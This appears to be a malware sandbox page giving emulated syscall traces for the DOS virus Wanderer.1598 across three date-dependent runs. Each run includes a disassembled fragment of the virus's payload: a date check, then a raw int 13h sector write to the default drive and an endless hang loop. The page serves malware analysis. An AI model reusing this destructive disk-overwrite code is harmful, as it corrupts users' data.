Sample viewer

vx.netlux.org/Virus.DOS.KOV.Wanderer.1598

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:42:03.562824316Z 240 PC: 13e2b | UNKNOWN!
2018-12-17T22:42:03.574281578Z 255 PC: 13e5f | UNKNOWN!
2018-12-17T22:42:03.575529463Z 74 PC: 12f42 | Reallocate memory
2018-12-17T22:42:03.577261204Z 75 PC: 12fa8 | Execute program
2018-12-17T22:42:03.593772416Z 9 PC: 13302 | Display string (String= 'Goat file (EXE). Size=000011A0h/0000004512d bytes. ')
2018-12-17T22:42:03.59833858Z 76 PC: 13306 | Terminate with return code (Return code = '36')
2018-12-17T22:42:03.600793101Z 73 PC: 12fae | Release memory
2018-12-17T22:42:03.601755202Z 77 PC: 12fb2 | Get program return code
2018-12-17T22:42:03.602878811Z 42 PC: 12fb6 | Get date 0x12fb6: cmp al, 6
0x12fb8: je 0x12fc2
0x12fba: mov ah, 0x31
0x12fbc: mov dx, 0x7e
0x12fbf: call 0x22b09
0x12fc2: mov ah, 0x19
0x12fc4: int 0x21
0x12fc6: mov dl, al
0x12fc8: cmp dl, 2
0x12fcb: jb 0x12fcf
0x12fcd: add al, 0x7e
0x12fcf: mov ah, 3
0x12fd1: mov al, 9
0x12fd3: mov bx, 0x6ae
0x12fd6: mov cx, 1
0x12fd9: mov dh, 0
0x12fdb: int 0x13
0x12fdd: nop
0x12fde: nop
0x12fdf: jmp 0x12fdd
2018-12-17T22:42:03.60430036Z 49 PC: 12b0f | Terminate and stay resident (Return code = '1' | Memory size = '126')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7430,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:41.3254422Z 240 PC: 13e2b | UNKNOWN!
2018-12-25T12:01:41.326787523Z 255 PC: 13e5f | UNKNOWN!
2018-12-25T12:01:41.327948006Z 74 PC: 12f42 | Reallocate memory
2018-12-25T12:01:41.32900785Z 75 PC: 12fa8 | Execute program
2018-12-25T12:01:41.338974255Z 9 PC: 13302 | Display string (String= 'Goat file (EXE). Size=000011A0h/0000004512d bytes. ')
2018-12-25T12:01:41.342181077Z 76 PC: 13306 | Terminate with return code (Return code = '36')
2018-12-25T12:01:41.344125636Z 73 PC: 12fae | Release memory
2018-12-25T12:01:41.345685527Z 77 PC: 12fb2 | Get program return code
2018-12-25T12:01:41.346874894Z 42 PC: 12fb6 | Get date 0x12fb6: cmp al, 6
0x12fb8: je 0x12fc2
0x12fba: mov ah, 0x31
0x12fbc: mov dx, 0x7e
0x12fbf: call 0x22b09
0x12fc2: mov ah, 0x19
0x12fc4: int 0x21
0x12fc6: mov dl, al
0x12fc8: cmp dl, 2
0x12fcb: jb 0x12fcf
0x12fcd: add al, 0x7e
0x12fcf: mov ah, 3
0x12fd1: mov al, 9
0x12fd3: mov bx, 0x6ae
0x12fd6: mov cx, 1
0x12fd9: mov dh, 0
0x12fdb: int 0x13
0x12fdd: nop
0x12fde: nop
0x12fdf: jmp 0x12fdd
2018-12-25T12:01:41.349090393Z 49 PC: 12b0f | Terminate and stay resident (Return code = '2' | Memory size = '126')

{"DateBased":true,"Day":5,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7430,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:41.392621829Z 240 PC: 13e2b | UNKNOWN!
2018-12-25T12:01:41.393843787Z 255 PC: 13e5f | UNKNOWN!
2018-12-25T12:01:41.396182721Z 74 PC: 12f42 | Reallocate memory
2018-12-25T12:01:41.397891692Z 75 PC: 12fa8 | Execute program
2018-12-25T12:01:41.413093625Z 9 PC: 13302 | Display string (String= 'Goat file (EXE). Size=000011A0h/0000004512d bytes. ')
2018-12-25T12:01:41.41863792Z 76 PC: 13306 | Terminate with return code (Return code = '36')
2018-12-25T12:01:41.421437606Z 73 PC: 12fae | Release memory
2018-12-25T12:01:41.423060191Z 77 PC: 12fb2 | Get program return code
2018-12-25T12:01:41.424141193Z 42 PC: 12fb6 | Get date 0x12fb6: cmp al, 6
0x12fb8: je 0x12fc2
0x12fba: mov ah, 0x31
0x12fbc: mov dx, 0x7e
0x12fbf: call 0x22b09
0x12fc2: mov ah, 0x19
0x12fc4: int 0x21
0x12fc6: mov dl, al
0x12fc8: cmp dl, 2
0x12fcb: jb 0x12fcf
0x12fcd: add al, 0x7e
0x12fcf: mov ah, 3
0x12fd1: mov al, 9
0x12fd3: mov bx, 0x6ae
0x12fd6: mov cx, 1
0x12fd9: mov dh, 0
0x12fdb: int 0x13
0x12fdd: nop
0x12fde: nop
0x12fdf: jmp 0x12fdd
2018-12-25T12:01:41.426179038Z 25 PC: 12fc6 | Get default drive